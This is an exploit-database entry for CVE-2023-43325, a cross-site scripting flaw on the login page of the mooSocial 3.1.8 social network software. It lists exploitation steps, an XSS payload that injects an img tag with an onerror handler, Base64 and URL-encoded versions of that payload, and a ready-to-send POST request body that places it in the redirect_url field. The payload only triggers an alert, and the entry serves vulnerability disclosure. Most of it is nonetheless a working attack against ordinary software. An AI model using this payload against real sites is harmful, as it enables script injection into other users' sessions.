## https://sploitus.com/exploit?id=EDB-ID:51766
# Exploit Title: mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page
# Date: 26 September 2023
# Exploit Author: Astik Rawat (ahrixia)
# Vendor Homepage: https://moosocial.com
# Software Link: https://travel.moosocial.com/
# Version: 3.1.8
# Tested on: Windows 11
# CVE : CVE-2023-43325
Description:
A Cross Site Scripting (XSS) vulnerability exists on the user login page in mooSocial which is a social network website.
Steps to exploit:
1) Go to Login page on the website and login with credentials.
2) Insert your payload in the "data[redirect_url]" - POST Request
Proof of concept (Poc):
The following payload will allow you to execute XSS -
Payload (Plain text):
test"><img src=a onerror=alert(1)>test
Payload (Base64 encoded) :
dGVzdCI+PGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q=
Final Payload (Base64+Url encoded):
dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d
POST Request on /moosocial/users/login (POST REQUEST DATA ONLY):
[_method=POST&data%5Bredirect_url%5D=dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d&data%5BUser%5D%5Bid%5D=&data%5BUser%5D%5Bemail%5D=admin%40localhost.com&data%5BUser%5D%5Bpassword%5D=pas[redacted]&data%5Bremember%5D=0]